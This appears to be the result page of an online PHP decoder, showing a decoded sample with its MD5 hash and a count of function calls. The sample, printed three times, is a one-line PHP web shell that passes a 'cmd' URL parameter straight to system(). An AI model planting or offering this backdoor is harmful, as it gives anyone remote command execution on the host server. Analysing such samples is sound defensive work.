Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $cmd = $_GET["cmd"]; system($cmd); ?>..
Decoded Output download
<?php $cmd = $_GET["cmd"]; system($cmd); ?>
Did this file decode correctly?
Original Code
<?php $cmd = $_GET["cmd"]; system($cmd); ?>
Function Calls
system | 1 |
Stats
MD5 | 38e825f5c475ffe28097a27725af3e7b |
Eval Count | 0 |
Decode Time | 53 ms |